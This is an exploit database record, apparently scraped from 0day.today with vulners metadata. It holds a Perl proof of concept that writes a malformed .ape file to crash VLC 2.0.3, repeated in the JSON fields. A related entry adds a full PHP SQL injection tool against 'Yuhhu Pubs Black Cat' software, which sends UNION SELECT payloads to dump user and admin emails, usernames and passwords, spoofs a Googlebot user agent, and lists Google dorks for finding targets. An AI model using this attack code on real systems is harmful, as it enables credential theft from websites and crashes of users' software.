ID 1337DAY-ID-20160
Type zdt
Reporter The Black Devils
Modified 2013-01-12T00:00:00
Description
Exploit for windows platform in category dos / poc
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# _ __ __ __ #
# /' \ __ /'__`\ /\ \__ /'__`\ #
# /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ #
# \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ #
# \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ #
# \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ #
# \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ #
# \ \____/ >> Exploit database separated by exploit #
# \/___/ type (local, remote, DoS, etc.) #
# #
# [+] Site : 1337day.com #
# [+] Support e-mail : submit[at]1337day.com #
# #
# ######################################### #
# I'm The Black Devils member from Inj3ct0r Team #
# ######################################### #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Title : Lecteur multimédia VLC 2.0.3 Twoflower (.ape) Crash Poc
# Date: 2012-01-09
# Software Link: http://www.videolan.org/vlc/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";
print " |=======================================================|\n";
print " |= [!] Name : VLC 2.0.3 || .APE File =|\n";
print " |= [!] Exploit : Crash Exploit =|\n";
print " |= [!] Author : The Black Devils =|\n";
print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";
print " |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Dz.ape");
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
# 0day.today [2018-03-13] #
{"hash": "8e6ed19d2183c90d9227071cb7e53c1552a53b6df498c55c6bb7b50b82747596", "id": "1337DAY-ID-20160", "lastseen": "2018-03-13T16:16:58", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "9ee2255abc443b108cc0438be8b5244b", "key": "href"}, {"hash": "dd2ba36bff20e8f5f4aa52e7bd73c405", "key": "modified"}, {"hash": "dd2ba36bff20e8f5f4aa52e7bd73c405", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "af45deb26e8c23fcb3a01773d6d77b77", "key": "reporter"}, {"hash": "9067d523cfe670962b1e5380f2079f74", "key": "sourceData"}, {"hash": "9f24dd40d5ddd522d48c24d1f843ca5d", "key": "sourceHref"}, {"hash": "7e50668146f3b54fc15665efc31bf1aa", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-03-13T16:16:58"}, "vulnersScore": 9.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/20160", "description": "Exploit for windows platform in category dos / poc", "title": "Lecteur multimedia VLC 2.0.3 Twoflower (.ape) Crash Poc", "history": [{"bulletin": {"hash": "ed4b0cb7f07fb356940bfe11fb4de65a3e26576c6b6d6cce5492ccf7576be0df", "id": "1337DAY-ID-20160", "lastseen": "2016-04-20T02:08:12", "enchantments": {"score": {"value": 1.2, "modified": "2016-04-20T02:08:12"}}, "hashmap": [{"hash": "6c7e388ce9fb8ef230983f981ff74224", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "32331cacc9655b8141bb93ee2f141e25", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c7858a4344e0f7a806409c2bd4338804", "key": "sourceHref"}, {"hash": "af45deb26e8c23fcb3a01773d6d77b77", "key": "reporter"}, {"hash": "dd2ba36bff20e8f5f4aa52e7bd73c405", "key": "published"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "7e50668146f3b54fc15665efc31bf1aa", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "dd2ba36bff20e8f5f4aa52e7bd73c405", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/20160", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "Lecteur multimedia VLC 2.0.3 Twoflower (.ape) Crash Poc", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\r\n# _ __ __ __ #\r\n# /' \\ __ /'__`\\ /\\ \\__ /'__`\\ #\r\n# /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ #\r\n# \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ #\r\n# \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ #\r\n# \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ #\r\n# \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ #\r\n# \\ \\____/ >> Exploit database separated by exploit #\r\n# \\/___/ type (local, remote, DoS, etc.) #\r\n# #\r\n# [+] Site : 1337day.com #\r\n# [+] Support e-mail : submit[at]1337day.com #\r\n# #\r\n# ######################################### #\r\n# I'm The Black Devils member from Inj3ct0r Team #\r\n# ######################################### #\r\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#\r\n\r\n# Title : Lecteur multim\u00e9dia VLC 2.0.3 Twoflower (.ape) Crash Poc\r\n# Date: 2012-01-09\r\n# Software Link: http://www.videolan.org/vlc/\r\n# Author: The Black Devils\r\n# Tested on: Windows XP SP2\r\n# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz\r\n\r\n#!/usr/bin/perl\r\nsystem(\"title The Black Devils\");\r\nsystem(\"color 1e\");\r\nsystem(\"cls\");\r\nprint \"\\n\\n\"; \r\nprint \" |=======================================================|\\n\";\r\nprint \" |= [!] Name : VLC 2.0.3 || .APE File =|\\n\";\r\nprint \" |= [!] Exploit : Crash Exploit =|\\n\";\r\nprint \" |= [!] Author : The Black Devils =|\\n\";\r\nprint \" |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\\n\";\r\nprint \" |=======================================================|\\n\";\r\nsleep(2);\r\nprint \"\\n\";\r\n# Creating ...\r\nmy $PoC = \"\\x4D\\x41\\x43\\x20\\x96\\x0f\\x00\\x00\\x34\\x00\\x00\\x00\\x18\\x00\\x00\\x00\"; # APE Header\r\nopen(file , \">\", \"Dz.ape\"); \r\nprint file $PoC; \r\nprint \"\\n [+] File successfully created!\\n\" or die print \"\\n [-] OupsS! File is Not Created !! \";\r\nclose(file);\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2016-04-20] #", "published": "2013-01-12T00:00:00", "references": [], "reporter": "The Black Devils", "modified": "2013-01-12T00:00:00", "href": "http://0day.today/exploit/description/20160"}, "lastseen": "2016-04-20T02:08:12", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\r\n# _ __ __ __ #\r\n# /' \\ __ /'__`\\ /\\ \\__ /'__`\\ #\r\n# /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ #\r\n# \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ #\r\n# \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ #\r\n# \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ #\r\n# \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ #\r\n# \\ \\____/ >> Exploit database separated by exploit #\r\n# \\/___/ type (local, remote, DoS, etc.) #\r\n# #\r\n# [+] Site : 1337day.com #\r\n# [+] Support e-mail : submit[at]1337day.com #\r\n# #\r\n# ######################################### #\r\n# I'm The Black Devils member from Inj3ct0r Team #\r\n# ######################################### #\r\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#\r\n\r\n# Title : Lecteur multim\u00e9dia VLC 2.0.3 Twoflower (.ape) Crash Poc\r\n# Date: 2012-01-09\r\n# Software Link: http://www.videolan.org/vlc/\r\n# Author: The Black Devils\r\n# Tested on: Windows XP SP2\r\n# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz\r\n\r\n#!/usr/bin/perl\r\nsystem(\"title The Black Devils\");\r\nsystem(\"color 1e\");\r\nsystem(\"cls\");\r\nprint \"\\n\\n\"; \r\nprint \" |=======================================================|\\n\";\r\nprint \" |= [!] Name : VLC 2.0.3 || .APE File =|\\n\";\r\nprint \" |= [!] Exploit : Crash Exploit =|\\n\";\r\nprint \" |= [!] Author : The Black Devils =|\\n\";\r\nprint \" |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\\n\";\r\nprint \" |=======================================================|\\n\";\r\nsleep(2);\r\nprint \"\\n\";\r\n# Creating ...\r\nmy $PoC = \"\\x4D\\x41\\x43\\x20\\x96\\x0f\\x00\\x00\\x34\\x00\\x00\\x00\\x18\\x00\\x00\\x00\"; # APE Header\r\nopen(file , \">\", \"Dz.ape\"); \r\nprint file $PoC; \r\nprint \"\\n [+] File successfully created!\\n\" or die print \"\\n [-] OupsS! File is Not Created !! \";\r\nclose(file);\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2018-03-13] #", "published": "2013-01-12T00:00:00", "references": [], "reporter": "The Black Devils", "modified": "2013-01-12T00:00:00", "href": "https://0day.today/exploit/description/20160"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "<?php\r\n/*\r\nCoded By RMx\r\nYuhhu Pubs Black Cat Remote SQL Injection Exploit\r\nCoderx.Org & Biyosecurity.com\r\nThanx : Liz0zim - Otistiq\r\nScript Demo & Sales :\r\nhttp://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhuscript/6-yuhhuserisi/8-pubs\r\nDork --> inurl: browse.groups.php \r\nDork 2 --> inurl:browse.events.php\r\nDork 3 --> browse.music.php\r\nDork 4 --> browse.groups.php\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\necho "\r\n<title>Yuhhu Pubs Exploit [ Coded By RMx ]</title>\r\n<form action='' method=post>\r\nUSERS EXPLOIT :<br>\r\nÖrnek :http://www.example.com<br>\r\n<input type=text name='site'>\r\n<input type=submit value=RMx>\r\n</form>";\r\nif (isset($_POST['site']))\r\n{\r\n$site=$_POST['site'];\r\n$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D61696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,password),5,6,7,8,9+from+joovili_users";\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_URL, $site."/".$hacker);\r\ncurl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');\r\ncurl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');\r\n$html = curl_exec($curl);\r\ncurl_close($curl);\r\npreg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);\r\nforeach ($huseyin[1] as $biyosecurity)\r\n{\r\necho $biyosecurity ."<br>";\r\n}\r\n}\r\n\r\necho "\r\n\r\n<form action='' method=post>\r\nADMIN EXPLOIT :<br>\r\nÖrnek :http://www.example.com<br>\r\n<input type=text name='admin'>\r\n<input type=submit value=RMx>\r\n</form>";\r\nif (isset($_POST['admin']))\r\n{\r\n$site=$_POST['admin'];\r\n$hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B756C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,6,7,8,9+from+joovili_admins";\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_URL, $site."/".$hacker);\r\ncurl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)');\r\ncurl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');\r\n$html = curl_exec($curl);\r\ncurl_close($curl);\r\npreg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin);\r\nforeach ($huseyin[1] as $biyosecurity)\r\n{\r\necho $biyosecurity ."<br>";\r\n}\r\n}\r\n?>", "modified": "2008-07-15T00:00:00", "published": "2008-07-15T00:00:00", "id": "SECURITYVULNS:DOC:20160", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20160", "title": "Yuhhu Pubs Black Cat Remote SQL Injection Exploit", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nphpWebSite: automated registration, crossite scripting.", "modified": "2008-07-15T00:00:00", "published": "2008-07-15T00:00:00", "id": "SECURITYVULNS:VULN:9149", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9149", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
